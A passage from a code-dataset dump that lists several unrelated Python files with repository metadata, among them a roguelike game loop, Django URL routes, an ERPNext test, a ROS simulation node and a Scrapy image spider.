def trap_filter(wf_in, rise, flat, wf_out):
"""
Symmetric trapezoidal filter
"""
wf_out[0] = wf_in[0]
for i in range(1, rise):
wf_out[i] = wf_out[i-1] + wf_in[i]
for i in range(rise, rise+flat):
wf_out[i] = wf_out[i-1] + wf_in[i] - wf_in[i-rise]
for i in range(rise+flat, 2*rise+flat):
wf_out[i] = wf_out[i-1] + wf_in[i] - wf_in[i-rise] - wf_in[i-rise-flat]
for i in range(2*rise+flat, len(wf_in)):
wf_out[i] = wf_out[i-1] + wf_in[i] - wf_in[i-rise] - wf_in[i-rise-flat] + wf_in[i-2*rise-flat]
| 37.541667
| 102
| 0.558269
| 0
| 0
| 0
| 0
| 848
| 0.941176
| 0
| 0
| 228
| 0.253052
|
42a664bd1e777200555f859b46debbdacf24989f
| 61
|
py
|
Python
|
other.py
|
nunenuh/idcard_datagen
|
694a1736f0f5c97c22462474991a6e32456f9498
|
[
"MIT"
] | 1
|
2020-09-30T04:34:01.000Z
|
2020-09-30T04:34:01.000Z
|
other.py
|
nunenuh/idcard_datagen
|
694a1736f0f5c97c22462474991a6e32456f9498
|
[
"MIT"
] | null | null | null |
other.py
|
nunenuh/idcard_datagen
|
694a1736f0f5c97c22462474991a6e32456f9498
|
[
"MIT"
] | null | null | null |
def is_true(a,b,c,d,e,f,g):
if a>10:
print(10)
| 10.166667
| 27
| 0.47541
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
42a67cbf934d63272df061aa18d737365bf0fa29
| 5,109
|
py
|
Python
|
pilferer/engine.py
|
Sebastian-dm/pilferer
|
5126377154c7ba08fbea1a9dfad752bf8b1c72a9
|
[
"MIT"
] | null | null | null |
pilferer/engine.py
|
Sebastian-dm/pilferer
|
5126377154c7ba08fbea1a9dfad752bf8b1c72a9
|
[
"MIT"
] | null | null | null |
pilferer/engine.py
|
Sebastian-dm/pilferer
|
5126377154c7ba08fbea1a9dfad752bf8b1c72a9
|
[
"MIT"
] | null | null | null |
import tcod
from input_handlers import handle_keys
from game_states import GameStates
from render_functions import clear_all, render_all, RenderOrder
from map_objects.game_map import GameMap
from fov_functions import initialize_fov, recompute_fov
from entity import Entity, get_blocking_entity_at_location
from components.fighter import Fighter
from death_functions import kill_monster, kill_player
VERSION = "0.2"
FONT = 'assets/arial10x10.png'
screen_width = 80
screen_height = 50
map_width = 80
map_height = 45
room_max_size = 10
room_min_size = 6
max_rooms = 30
fov_algorithm = 0
fov_light_walls = False
fov_radius = 10
max_monsters_per_room = 3
colors = {
'dark_wall': tcod.Color(0, 0, 0),
'light_wall': tcod.Color(120, 120, 80),
'dark_ground': tcod.Color(150, 150, 150),
'light_ground': tcod.Color(200, 200, 150)
}
def main():
""" Main game function """
fighter_component = Fighter(hp=30, defense=2, power=5)
player = Entity(0, 0, '@', tcod.white, 'Player', blocks=True,
render_order=RenderOrder.ACTOR, fighter=fighter_component)
entities = [player]
# Import font
tcod.console_set_custom_font(FONT, tcod.FONT_TYPE_GREYSCALE | tcod.FONT_LAYOUT_TCOD)
# Console initialization
tcod.console_init_root(screen_width, screen_height, 'Pilferer %s'%VERSION, False, vsync=False)
con = tcod.console.Console(screen_width, screen_height)
# Mapping
game_map = GameMap(map_width, map_height)
game_map.make_map(max_rooms, room_min_size, room_max_size, map_width,
map_height, player, entities, max_monsters_per_room)
# FOV
fov_recompute = True
fov_map = initialize_fov(game_map)
# Variables for holding input
key = tcod.Key()
mouse = tcod.Mouse()
# Game state
game_state = GameStates.PLAYERS_TURN
# Main game loop
while not tcod.console_is_window_closed():
# FOV
if fov_recompute:
recompute_fov(fov_map, player.x, player.y, fov_radius, fov_light_walls, fov_algorithm)
# Draw
render_all(con, entities, player, game_map, fov_map, fov_recompute, screen_width, screen_height, colors)
fov_recompute = False
tcod.console_flush()
clear_all(con, entities)
# INDPUT HANDLING
tcod.sys_check_for_event(tcod.EVENT_KEY_PRESS, key, mouse)
action = handle_keys(key)
# Command move
player_turn_results = []
move = action.get('move')
if move and game_state == GameStates.PLAYERS_TURN:
dx, dy = move
destination_x = player.x + dx
destination_y = player.y + dy
if not game_map.is_blocked(destination_x, destination_y):
target = get_blocking_entity_at_location(entities, destination_x, destination_y)
if target:
attack_results = player.fighter.attack(target)
player_turn_results.extend(attack_results)
else:
player.move(dx, dy)
fov_recompute = True
game_state = GameStates.ENEMY_TURN
# Command exit
exit = action.get('exit')
if exit:
return True
# Command Fullscreen
fullscreen = action.get('fullscreen')
if fullscreen:
tcod.console_set_fullscreen(not tcod.console_is_fullscreen())
# Results
for player_turn_result in player_turn_results:
message = player_turn_result.get('message')
dead_entity = player_turn_result.get('dead')
if message:
print(message)
if dead_entity:
if dead_entity == player:
message, game_state = kill_player(dead_entity)
else:
message = kill_monster(dead_entity)
print(message)
# Monster turns
if game_state == GameStates.ENEMY_TURN:
for entity in entities:
if entity.ai:
enemy_turn_results = entity.ai.take_turn(player, fov_map, game_map, entities)
for enemy_turn_result in enemy_turn_results:
message = enemy_turn_result.get('message')
dead_entity = enemy_turn_result.get('dead')
if message:
print(message)
if dead_entity:
if dead_entity == player:
message, game_state = kill_player(dead_entity)
else:
message = kill_monster(dead_entity)
print(message)
if game_state == GameStates.PLAYER_DEAD:
break
if game_state == GameStates.PLAYER_DEAD:
break
else:
game_state = GameStates.PLAYERS_TURN
game_state = GameStates.PLAYERS_TURN
if __name__ == '__main__':
main()
| 32.335443
| 112
| 0.603249
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 400
| 0.078293
|
42a6cbc1a232b14997c3952e709da0eebe84cd51
| 2,337
|
py
|
Python
|
galaxy/api/v2/urls.py
|
SamyCoenen/galaxy
|
7c17ef45e53b0fc2fe8a2c70a99f3947604e0b0e
|
[
"Apache-2.0"
] | null | null | null |
galaxy/api/v2/urls.py
|
SamyCoenen/galaxy
|
7c17ef45e53b0fc2fe8a2c70a99f3947604e0b0e
|
[
"Apache-2.0"
] | null | null | null |
galaxy/api/v2/urls.py
|
SamyCoenen/galaxy
|
7c17ef45e53b0fc2fe8a2c70a99f3947604e0b0e
|
[
"Apache-2.0"
] | null | null | null |
# (c) 2012-2019, Ansible by Red Hat
#
# This file is part of Ansible Galaxy
#
# Ansible Galaxy is free software: you can redistribute it and/or modify
# it under the terms of the Apache License as published by
# the Apache Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# Ansible Galaxy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# Apache License for more details.
#
# You should have received a copy of the Apache License
# along with Galaxy. If not, see <http://www.apache.org/licenses/>.
from django.urls import path
from galaxy.api.v2 import views
app_name = 'api'
urlpatterns = [
# Collection Imports URLs
path('collection-imports/<int:pk>/',
views.CollectionImportView.as_view(),
name='collection-import-detail'),
# Collection Version list URLs
path('collections/<int:pk>/versions/',
views.VersionListView.as_view(),
name='version-list'),
path('collections/<str:namespace>/<str:name>/versions/',
views.VersionListView.as_view(),
name='version-list'),
# Collection Version detail URLs
path('collection-versions/<int:version_pk>/',
views.VersionDetailView.as_view(),
name='version-detail'),
path('collections/<str:namespace>/<str:name>/versions/<str:version>/',
views.VersionDetailView.as_view(),
name='version-detail'),
# Collection Version Artifact download URLs
path('collection-versions/<int:pk>/artifact/',
views.CollectionArtifactView.as_view(),
name='version-artifact'),
path('collections/<namespace>/<name>/versions/<version>/artifact/',
views.CollectionArtifactView.as_view(),
name='version-artifact'),
# Collection URLs
path('collections/',
views.CollectionListView.as_view(),
name='collection-list'),
path('collections/<int:pk>/',
views.CollectionDetailView.as_view(),
name='collection-detail'),
# NOTE: needs to come after 'collections/<int:collection_pk>/versions/'
path('collections/<str:namespace>/<str:name>/',
views.CollectionDetailView.as_view(),
name='collection-detail'),
]
| 35.953846
| 75
| 0.682071
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,457
| 0.623449
|
42a78f723d388f6c17abd15949a96f2a870ca42a
| 1,933
|
py
|
Python
|
mindhome_alpha/erpnext/stock/doctype/stock_settings/test_stock_settings.py
|
Mindhome/field_service
|
3aea428815147903eb9af1d0c1b4b9fc7faed057
|
[
"MIT"
] | 1
|
2021-04-29T14:55:29.000Z
|
2021-04-29T14:55:29.000Z
|
mindhome_alpha/erpnext/stock/doctype/stock_settings/test_stock_settings.py
|
Mindhome/field_service
|
3aea428815147903eb9af1d0c1b4b9fc7faed057
|
[
"MIT"
] | null | null | null |
mindhome_alpha/erpnext/stock/doctype/stock_settings/test_stock_settings.py
|
Mindhome/field_service
|
3aea428815147903eb9af1d0c1b4b9fc7faed057
|
[
"MIT"
] | 1
|
2021-04-29T14:39:01.000Z
|
2021-04-29T14:39:01.000Z
|
# -*- coding: utf-8 -*-
# Copyright (c) 2017, Frappe Technologies Pvt. Ltd. and Contributors
# See license.txt
from __future__ import unicode_literals
import frappe
import unittest
class TestStockSettings(unittest.TestCase):
def setUp(self):
frappe.db.set_value("Stock Settings", None, "clean_description_html", 0)
def test_settings(self):
item = frappe.get_doc(dict(
doctype = 'Item',
item_code = 'Item for description test',
item_group = 'Products',
description = '<p><span style="font-size: 12px;">Drawing No. 07-xxx-PO132<br></span><span style="font-size: 12px;">1800 x 1685 x 750<br></span><span style="font-size: 12px;">All parts made of Marine Ply<br></span><span style="font-size: 12px;">Top w/ Corian dd<br></span><span style="font-size: 12px;">CO, CS, VIP Day Cabin</span></p>'
)).insert()
settings = frappe.get_single('Stock Settings')
settings.clean_description_html = 1
settings.save()
item.reload()
self.assertEqual(item.description, '<p>Drawing No. 07-xxx-PO132<br>1800 x 1685 x 750<br>All parts made of Marine Ply<br>Top w/ Corian dd<br>CO, CS, VIP Day Cabin</p>')
item.delete()
def test_clean_html(self):
settings = frappe.get_single('Stock Settings')
settings.clean_description_html = 1
settings.save()
item = frappe.get_doc(dict(
doctype = 'Item',
item_code = 'Item for description test',
item_group = 'Products',
description = '<p><span style="font-size: 12px;">Drawing No. 07-xxx-PO132<br></span><span style="font-size: 12px;">1800 x 1685 x 750<br></span><span style="font-size: 12px;">All parts made of Marine Ply<br></span><span style="font-size: 12px;">Top w/ Corian dd<br></span><span style="font-size: 12px;">CO, CS, VIP Day Cabin</span></p>'
)).insert()
self.assertEqual(item.description, '<p>Drawing No. 07-xxx-PO132<br>1800 x 1685 x 750<br>All parts made of Marine Ply<br>Top w/ Corian dd<br>CO, CS, VIP Day Cabin</p>')
item.delete()
| 42.021739
| 338
| 0.698914
| 1,749
| 0.904811
| 0
| 0
| 0
| 0
| 0
| 0
| 1,170
| 0.605277
|
42a96ad3b83164695c47573ef1f876f36eb4d891
| 1,148
|
py
|
Python
|
pybloxy/classes/http.py
|
R0bl0x10501050/roblox.py
|
cbbb25878627c2d837caaeb7edf37d0aeda615ae
|
[
"MIT"
] | null | null | null |
pybloxy/classes/http.py
|
R0bl0x10501050/roblox.py
|
cbbb25878627c2d837caaeb7edf37d0aeda615ae
|
[
"MIT"
] | null | null | null |
pybloxy/classes/http.py
|
R0bl0x10501050/roblox.py
|
cbbb25878627c2d837caaeb7edf37d0aeda615ae
|
[
"MIT"
] | null | null | null |
import logging
import requests
class Http:
def sendRequest(url):
payload = requests.get(str(url))
statusCode = payload.status_code
content = payload.content
if statusCode != 200:
return logging.error(f"[Pybloxy - GET] Something went wrong! Error Code: {statusCode}")
return content
def postRequest(url, payload):
payload = requests.post(str(url), data = payload)
statusCode = payload.status_code
content = payload.content
if statusCode != 200:
return logging.error(f"[Pybloxy - POST] Something went wrong! Error Code: {statusCode}")
return content
def patchRequest(url, payload):
payload = requests.patch(str(url), data = payload)
statusCode = payload.status_code
content = payload.content
if statusCode != 200:
return logging.error(f"[Pybloxy - PATCH] Something went wrong! Error Code: {statusCode}")
return content
def deleteRequest(url, payload):
payload = requests.delete(str(url))
statusCode = payload.status_code
content = payload.content
if statusCode != 200:
return logging.error(f"[Pybloxy - DELETE] Something went wrong! Error Code: {statusCode}")
return content
| 26.697674
| 93
| 0.722997
| 1,116
| 0.972125
| 0
| 0
| 0
| 0
| 0
| 0
| 266
| 0.231707
|
42a99e600220ea6f0c20b482db83263664318f69
| 1,305
|
py
|
Python
|
resources/nuice_simulations/src/layers_sim/layers_sim_node.py
|
SpyGuyIan/NUice
|
47991a848dac244b4c476b4a92f7a27a1f9e5dcc
|
[
"MIT"
] | 1
|
2021-08-17T00:40:42.000Z
|
2021-08-17T00:40:42.000Z
|
resources/nuice_simulations/src/layers_sim/layers_sim_node.py
|
SpyGuyIan/NUice
|
47991a848dac244b4c476b4a92f7a27a1f9e5dcc
|
[
"MIT"
] | 1
|
2021-01-31T17:15:40.000Z
|
2021-01-31T17:15:40.000Z
|
resources/nuice_simulations/src/layers_sim/layers_sim_node.py
|
NUMarsIce/NUice
|
47991a848dac244b4c476b4a92f7a27a1f9e5dcc
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import rospy
from std_msgs.msg import Float64
import random
possibleLayers = [140, 50, 80, 200, 100]
cur_position = 0.0
def position_callback(msg):
global cur_position
cur_position = msg.data
#Build the layers simulation, then publish material strengths. Lasts 100 seconds.
def runLayersSim():
numLayers = random.randint(10,20)
a = 1
layers = []
while (a < 1000):
size = random.randint(a + 1,1000) - a
strength = getNextLayerStrength()
setNextLayer(size,strength,layers)
a = a + size
pub = rospy.Publisher('material_strength', Float64, queue_size = 10)
rospy.init_node('layers_node', anonymous=True)
rate = rospy.Rate(10)
rospy.Subscriber("/drill_motor/cur_position", Float64, position_callback)
while((not rospy.is_shutdown()) and cur_position < 1000):
pub.publish(layers[int(cur_position)])
rate.sleep()
#Get the strength of the next layer from the list of possible layer strengths.
def getNextLayerStrength():
l = random.randint(0,len(possibleLayers) - 1)
return possibleLayers[l]
#Build the next layer of the simulation.
def setNextLayer(size,strength,layers):
for i in range(1,size):
layers.append(strength)
if __name__ == '__main__':
runLayersSim()
| 29
| 81
| 0.691954
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 289
| 0.221456
|
42a9a106ced30891f6bde30e0be69f4978578110
| 1,121
|
py
|
Python
|
imagescraper/imagescraper/spiders/image_crawl_spider.py
|
karthikn2789/Scrapy-Projects
|
84db4ed1a2f38d6fa03d1bfa6a6ebf9fb527f523
|
[
"MIT"
] | 2
|
2021-04-08T12:48:10.000Z
|
2021-06-16T09:42:39.000Z
|
imagescraper/imagescraper/spiders/image_crawl_spider.py
|
karthikn2789/Scrapy-Projects
|
84db4ed1a2f38d6fa03d1bfa6a6ebf9fb527f523
|
[
"MIT"
] | null | null | null |
imagescraper/imagescraper/spiders/image_crawl_spider.py
|
karthikn2789/Scrapy-Projects
|
84db4ed1a2f38d6fa03d1bfa6a6ebf9fb527f523
|
[
"MIT"
] | 6
|
2020-08-05T09:45:39.000Z
|
2021-11-16T14:05:20.000Z
|
import scrapy
import re
from scrapy.linkextractors import LinkExtractor
from scrapy.spiders import CrawlSpider, Rule
from ..items import ImagescraperItem
class ImageCrawlSpiderSpider(CrawlSpider):
name = "image_crawl_spider"
allowed_domains = ["books.toscrape.com"]
def start_requests(self):
url = "http://books.toscrape.com/"
yield scrapy.Request(url=url)
rules = (Rule(LinkExtractor(allow=r"catalogue/"), callback="parse_image", follow=True),)
def parse_image(self, response):
if response.xpath('//div[@class="item active"]/img').get() is not None:
img = response.xpath('//div[@class="item active"]/img/@src').get()
"""
Computing the Absolute path of the image file.
"image_urls" require absolute path, not relative path
"""
m = re.match(r"^(?:../../)(.*)$", img).group(1)
url = "http://books.toscrape.com/"
img_url = "".join([url, m])
image = ImagescraperItem()
image["image_urls"] = [img_url] # "image_urls" must be a list
yield image
| 36.16129
| 92
| 0.611954
| 964
| 0.859946
| 739
| 0.659233
| 0
| 0
| 0
| 0
| 399
| 0.355932
|